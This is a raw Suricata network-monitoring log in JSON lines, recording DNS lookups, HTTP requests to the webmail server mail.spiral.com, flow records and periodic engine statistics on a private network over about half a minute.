passed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":23423,"memcap":0}}} {"timestamp":"2020-02-29T00:08:48.000762+0000","flow_id":106092845825221,"event_type":"flow","src_ip":"192.168.10.122","src_port":45285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:47.425157+0000","end":"2020-02-29T00:03:47.531143+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:48.001048+0000","flow_id":1247342965809315,"event_type":"flow","src_ip":"192.168.10.122","src_port":48919,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:03:47.581795+0000","end":"2020-02-29T00:03:47.693010+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:08:53.000221+0000","event_type":"stats","stats":{"uptime":14185,"capture":{"kernel_packets":134091,"kernel_drops":0},"decoder":{"pkts":134094,"bytes":92655563,"invalid":184,"ipv4":132627,"ipv6":8,"ethernet":134094,"raw":0,"null":0,"sll":0,"tcp":127460,"udp":4968,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2726,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2742,"synack":2733,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1767,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2266,"failed_udp":110},"tx":{"http":4563,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2345}},"flow_mgr":{"closed_pruned":2706,"new_pruned":15,"est_pruned":2317,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19842,"memcap_state":0,"memcap_global":0},"http":{"memuse":23423,"memcap":0}}} 
{"timestamp":"2020-02-29T00:08:55.311909+0000","flow_id":886797661356645,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51170,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17907,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:55.421067+0000","flow_id":886797661356645,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51170,"proto":"UDP","dns":{"type":"answer","id":17907,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:55.421067+0000","flow_id":886797661356645,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51170,"proto":"UDP","dns":{"type":"answer","id":17907,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:55.580883+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7875}} 
{"timestamp":"2020-02-29T00:08:58.000694+0000","flow_id":642560046543245,"event_type":"flow","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":20,"bytes_toserver":3083,"bytes_toclient":18004,"start":"2020-02-29T00:07:46.405901+0000","end":"2020-02-29T00:07:57.100953+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:59.842681+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7875},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":43765,"tx_id":0}} {"timestamp":"2020-02-29T00:08:59.853060+0000","flow_id":795898973717572,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44755,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19807,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:59.961986+0000","flow_id":795898973717572,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44755,"proto":"UDP","dns":{"type":"answer","id":19807,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:08:59.961986+0000","flow_id":795898973717572,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44755,"proto":"UDP","dns":{"type":"answer","id":19807,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:00.000117+0000","event_type":"stats","stats":{"uptime":14192,"capture":{"kernel_packets":134094,"kernel_drops":0},"decoder":{"pkts":134112,"bytes":92665607,"invalid":184,"ipv4":132645,"ipv6":8,"ethernet":134112,"raw":0,"null":0,"sll":0,"tcp":127476,"udp":4970,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2727,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2743,"synack":2734,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1768,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2267,"failed_udp":110},"tx":{"http":4564,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2346}},"flow_mgr":{"closed_pruned":2706,"new_pruned":15,"est_pruned":2317,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20502,"memcap_state":0,"memcap_g
lobal":0},"http":{"memuse":92699,"memcap":0}}} {"timestamp":"2020-02-29T00:09:00.000475+0000","flow_id":158826455069850,"event_type":"flow","src_ip":"192.168.10.122","src_port":42601,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:59.357530+0000","end":"2020-02-29T00:03:59.469367+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:00.019586+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525}} {"timestamp":"2020-02-29T00:09:00.292803+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36696,"tx_id":1}} 
{"timestamp":"2020-02-29T00:09:00.304656+0000","flow_id":1395802825860624,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56407,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39008,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:00.413211+0000","flow_id":1395802825860624,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56407,"proto":"UDP","dns":{"type":"answer","id":39008,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:00.413211+0000","flow_id":1395802825860624,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56407,"proto":"UDP","dns":{"type":"answer","id":39008,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:00.482461+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":958}} {"timestamp":"2020-02-29T00:09:00.482461+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":958},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:09:01.000220+0000","flow_id":1832429181487928,"event_type":"flow","src_ip":"192.168.10.122","src_port":47014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:00.084792+0000","end":"2020-02-29T00:04:00.190190+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:05.483487+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":958},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2478,"tx_id":2}} {"timestamp":"2020-02-29T00:09:06.448779+0000","flow_id":816196989671691,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40498,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23974,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:09:06.465234+0000","flow_id":1235763754834258,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50319,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28746,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:06.557375+0000","flow_id":816196989671691,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40498,"proto":"UDP","dns":{"type":"answer","id":23974,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:06.557375+0000","flow_id":816196989671691,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40498,"proto":"UDP","dns":{"type":"answer","id":23974,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:06.573102+0000","flow_id":1235763754834258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50319,"proto":"UDP","dns":{"type":"answer","id":28746,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:06.573102+0000","flow_id":1235763754834258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50319,"proto":"UDP","dns":{"type":"answer","id":28746,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:06.763752+0000","flow_id":1278752082539280,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6127}} {"timestamp":"2020-02-29T00:09:06.849661+0000","flow_id":1096924642080953,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34776,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:09:06.858247+0000","flow_id":1205458465593479,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58650,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":55420,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:06.968272+0000","flow_id":1205458465593479,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58650,"proto":"UDP","dns":{"type":"answer","id":55420,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:06.968272+0000","flow_id":1205458465593479,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58650,"proto":"UDP","dns":{"type":"answer","id":55420,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:09:07.000198+0000","event_type":"stats","stats":{"uptime":14199,"capture":{"kernel_packets":134141,"kernel_drops":0},"decoder":{"pkts":134146,"bytes":92679633,"invalid":184,"ipv4":132675,"ipv6":8,"ethernet":134146,"raw":0,"null":0,"sll":0,"tcp":127502,"udp":4974,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2727,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2743,"synack":2734,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1768,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2269,"failed_udp":110},"tx":{"http":4566,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2348}},"flow_mgr":{"closed_pruned":2707,"new_pruned":15,"est_pruned":2319,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21164,"memcap_state":0,"memcap_global":0},"http":{"memuse":54407,"memcap":0}}} 
{"timestamp":"2020-02-29T00:09:07.001323+0000","flow_id":1073078963949837,"event_type":"flow","src_ip":"192.168.10.122","src_port":49816,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:06.676109+0000","end":"2020-02-29T00:04:06.787475+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:08.000523+0000","flow_id":1274951032280348,"event_type":"flow","src_ip":"192.168.10.130","src_port":34764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1291,"bytes_toclient":1056,"start":"2020-02-29T00:08:02.038172+0000","end":"2020-02-29T00:08:07.254988+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:10.000529+0000","flow_id":1197830584211840,"event_type":"flow","src_ip":"192.168.10.122","src_port":45696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:09.268672+0000","end":"2020-02-29T00:04:09.374158+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:10.345020+0000","flow_id":339305296184252,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33829,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61178,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:09:10.453617+0000","flow_id":339305296184252,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33829,"proto":"UDP","dns":{"type":"answer","id":61178,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:10.453617+0000","flow_id":339305296184252,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33829,"proto":"UDP","dns":{"type":"answer","id":61178,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:10.521043+0000","flow_id":127932775662908,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":410}} {"timestamp":"2020-02-29T00:09:10.521043+0000","flow_id":127932775662908,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":410},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} 
{"timestamp":"2020-02-29T00:09:11.000542+0000","flow_id":1451800606154932,"event_type":"flow","src_ip":"192.168.10.81","src_port":52702,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":2,"pkts_toclient":1,"bytes_toserver":128,"bytes_toclient":74,"start":"2020-02-29T00:08:10.925876+0000","end":"2020-02-29T00:08:10.926127+0000","age":0,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"16","tcp_flags_ts":"06","tcp_flags_tc":"12","syn":true,"rst":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:11.001968+0000","flow_id":1684033767133257,"event_type":"flow","src_ip":"192.168.10.122","src_port":53940,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:10.577609+0000","end":"2020-02-29T00:04:10.689883+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:11.764976+0000","flow_id":1278752082539280,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34774,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6127},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30701,"tx_id":0}} {"timestamp":"2020-02-29T00:09:11.000848+0000","flow_id":1066967241298197,"event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux 
x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":2}} {"timestamp":"2020-02-29T00:09:12.622045+0000","flow_id":1076287324585437,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41432,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:12.730774+0000","flow_id":1076287324585437,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37956,"proto":"UDP","dns":{"type":"answer","id":41432,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:12.730774+0000","flow_id":1076287324585437,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37956,"proto":"UDP","dns":{"type":"answer","id":41432,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:12.821690+0000","flow_id":2001607963729589,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34778,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3336}} 
